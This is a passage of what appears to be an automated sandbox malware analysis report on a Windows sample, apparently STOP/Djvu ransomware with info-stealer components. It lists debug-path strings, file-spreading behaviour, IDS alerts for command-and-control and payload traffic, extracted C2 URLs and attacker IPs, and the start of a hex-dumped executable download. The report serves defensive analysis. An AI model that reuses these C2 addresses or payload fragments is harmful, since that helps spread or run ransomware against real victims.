Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\WinX\d.pdb source: SUwX12D2S6.exe, 00000004.00000003.2242116659.000000000375B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SUwX12D2S6.exe, 00000004.00000003.1785234660.00000000097F0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: SUwX12D2S6.exe, 00000000.00000002.1676946978.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000001.00000002.1694613073.0000000000400000.00000040.00000400.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000003.00000002.1701674378.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000002.2243904603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000005.00000002.1719252737.0000000005E60000.00000040.00001000.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000006.00000002.4129272399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, SUwX12D2S6.exe, 0000000B.00000002.1848123271.0000000005E70000.00000040.00001000.00020000.00000000.sdmp, SUwX12D2S6.exe, 0000000C.00000002.1864325643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000017.00000002.2105470149.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000018.00000002.2116911139.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: SUwX12D2S6.exe, 00000004.00000003.2233587760.000000000394F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2233015637.000000000390F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2231618846.00000000038EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: SUwX12D2S6.exe, 00000004.00000003.2174356824.00000000037A2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2183331491.00000000037A2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2185146314.00000000037A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\.log, source: SUwX12D2S6.exe, 00000004.00000003.1881875981.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.1881957469.00000000033DC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.bgzq source: SUwX12D2S6.exe, 00000004.00000003.2109828995.0000000003479000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: SUwX12D2S6.exe, 00000004.00000003.2158386481.0000000003410000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135310569.0000000003493000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135411368.000000000340B000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2156718696.00000000033E7000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136261874.000000000350D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136368733.0000000003534000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2157238464.000000000340B000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135016253.00000000033F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\RecoveryImproved\.pdb\ source: SUwX12D2S6.exe, 00000004.00000003.2231998014.0000000003853000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2223567308.000000000376A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2226563641.0000000003853000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2233139919.000000000387B000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2232892838.000000000386A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2231922111.000000000383E000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2223984909.000000000382F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ata\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\_m source: SUwX12D2S6.exe, 00000004.00000003.2185362388.00000000033FC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: HC:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 0000000A.00000000.1805138719.0000000000401000.00000020.00000001.01000000.00000009.sdmp, build3.exe, 0000000A.00000002.1913333134.0000000000401000.00000020.00000001.01000000.00000009.sdmp, build3.exe, 00000010.00000000.1911812806.0000000000401000.00000020.00000001.01000000.00000009.sdmp, mstsca.exe, 00000013.00000000.1918990852.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000013.00000002.2018872471.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000014.00000000.2017466458.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000019.00000002.2348608889.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000019.00000000.2275814306.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001A.00000000.2347560708.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001C.00000002.2973317219.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001C.00000000.2865813530.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001D.00000000.2972376587.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001E.00000002.3583754315.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001E.00000000.3466010192.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001F.00000000.3582957712.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000020.00000002.4129370107.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000020.00000000.4066108806.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: SUwX12D2S6.exe, 00000004.00000003.2226957493.00000000038C6000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2225920544.00000000038C2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2225038196.0000000003192000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2223567308.00000000038C2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2217897189.00000000038AB000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2216202881.00000000038A9000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2218553034.00000000038C2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2227590465.00000000038DF000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2217675191.00000000038A9000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2216776414.000000000318D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2216475290.0000000003183000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\we\ source: SUwX12D2S6.exe, 00000004.00000003.2169696594.000000000350D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\e\AC\ source: SUwX12D2S6.exe, 00000004.00000003.2159195532.0000000003733000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\f source: SUwX12D2S6.exe, 00000004.00000003.2135310569.0000000003493000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2110681040.00000000034F2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136261874.000000000350D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135016253.00000000033F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\\Packa source: SUwX12D2S6.exe, 00000004.00000003.2136536137.0000000003169000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2110957880.000000000315A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135929742.0000000003168000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136570770.000000000316F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.1881793763.000000000316C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\censes] source: SUwX12D2S6.exe, 00000004.00000003.1882036014.0000000003148000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.1843805332.0000000003148000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: SUwX12D2S6.exe, 00000004.00000003.2170331603.0000000003576000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2184159938.0000000003576000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Data source: SUwX12D2S6.exe, 00000004.00000003.2184159938.0000000003576000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\\ source: SUwX12D2S6.exe, 00000004.00000003.2183331491.000000000376A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2202393003.000000000376B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.bgzq~ source: SUwX12D2S6.exe, 00000004.00000003.2110681040.00000000034F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: SUwX12D2S6.exe, 00000004.00000003.2159195532.000000000375A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2174356824.000000000375B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e\5o source: SUwX12D2S6.exe, 00000004.00000003.2159543171.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2157718043.00000000031A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: SUwX12D2S6.exe, 00000004.00000003.2185146314.0000000003802000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2202393003.00000000037AA000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2202710386.00000000037CB000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2203093794.00000000037E3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\a\* source: SUwX12D2S6.exe, 00000004.00000003.1881875981.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.1881957469.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2110134134.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2111097747.0000000003405000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\DC source: SUwX12D2S6.exe, 00000004.00000003.2136680554.000000000314E000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136154375.0000000003148000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2110957880.000000000315A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: SUwX12D2S6.exe, 00000004.00000003.2110681040.00000000034F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: SUwX12D2S6.exe, 00000004.00000003.2174680367.000000000345E000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2174757810.000000000346A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2170130034.0000000003413000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2174049173.000000000341F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2174506625.0000000003420000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\uf?% source: SUwX12D2S6.exe, 00000004.00000003.2135310569.0000000003493000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2110681040.00000000034F2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136261874.000000000350D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135016253.00000000033F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\_ source: SUwX12D2S6.exe, 00000004.00000003.2242116659.000000000375B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\acrobat_sbx\Adobe\d.pdb source: SUwX12D2S6.exe, 00000004.00000003.2135310569.0000000003493000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136261874.000000000350D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136368733.0000000003534000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135016253.00000000033F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\R source: SUwX12D2S6.exe, 00000004.00000003.2135310569.0000000003493000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2110681040.00000000034F2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136261874.000000000350D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136368733.0000000003534000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135016253.00000000033F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e source: SUwX12D2S6.exe, 00000004.00000003.2185322786.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2174464257.00000000033C4000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2169889587.00000000033C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: SUwX12D2S6.exe, 00000004.00000003.2135697139.00000000033C5000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2110208589.00000000033B8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: SUwX12D2S6.exe, 00000004.00000003.2242116659.000000000375B000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2236436289.0000000003893000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ source: SUwX12D2S6.exe, 00000004.00000003.2135697139.00000000033C5000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2110208589.00000000033B8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: build2.exe, 00000008.00000002.1970716529.0000000020E29000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1970251533.000000001E8E8000.00000002.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.bgzqqg.bgzq13be82808d6d800486d215022e11c6ece1ta\Application Data\Application Data\ApplicR source: SUwX12D2S6.exe, 00000004.00000003.2209794574.0000000003141000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2201372327.0000000003141000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2203525691.0000000003152000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\e\ source: SUwX12D2S6.exe, 00000004.00000003.2136536137.0000000003169000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2110957880.000000000315A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135929742.0000000003168000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136570770.000000000316F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.1881793763.000000000316C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\4 source: SUwX12D2S6.exe, 00000004.00000003.1881875981.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.1881957469.00000000033DC000.00000004.00000020.00020000.00000000.sdmp

Spreading

barindex
Source: C:\Users\user\Desktop\SUwX12D2S6.exe System file written: C:\Users\user\AppData\Local\Temp\chrome.exe Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose, 1_2_00410160
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose, 1_2_0040F730
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose, 1_2_0040FB98
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose, 4_2_0040F730
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_00410160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose, 4_2_00410160
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose, 4_2_0040FB98
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Networking

barindex
Source: Traffic Snort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.4:49735 -> 189.232.19.193:80
Source: Traffic Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.4:49733 -> 175.119.10.231:80
Source: Traffic Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.4:49733 -> 175.119.10.231:80
Source: Traffic Snort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 189.232.19.193:80 -> 192.168.2.4:49735
Source: Traffic Snort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 189.232.19.193:80 -> 192.168.2.4:49734
Source: Traffic Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.4:49736 -> 189.232.19.193:80
Source: Traffic Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.4:49736 -> 189.232.19.193:80
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199673019888
Source: Malware configuration extractor URLs: http://cajgtus.com/test2/get.php
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:27:10 GMTContent-Type: application/octet-streamContent-Length: 296448Last-Modified: Tue, 23 Apr 2024 19:19:16 GMTConnection: closeETag: "662809b4-48600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce d6 de 9e 8a b7 b0 cd 8a b7 b0 cd 8a b7 b0 cd 87 e5 6f cd 90 b7 b0 cd 87 e5 50 cd f6 b7 b0 cd 87 e5 51 cd a6 b7 b0 cd 83 cf 23 cd 83 b7 b0 cd 8a b7 b1 cd f8 b7 b0 cd 3f 29 55 cd 8b b7 b0 cd 87 e5 6b cd 8b b7 b0 cd 3f 29 6e cd 8b b7 b0 cd 52 69 63 68 8a b7 b0 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 47 05 fb 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 e6 00 00 00 30 60 01 00 00 00 00 6d 40 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 61 01 00 04 00 00 00 d6 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 6a 01 00 64 00 00 00 00 40 60 01 66 ef 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 60 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 98 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 e4 00 00 00 10 00 00 00 e6 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 50 74 00 00 00 00 01 00 00 76 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e4 b5 5e 01 00 80 01 00 00 36 02 00 00 60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 66 ef 00 00 00 40 60 01 00 f0 00 00 00 96 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 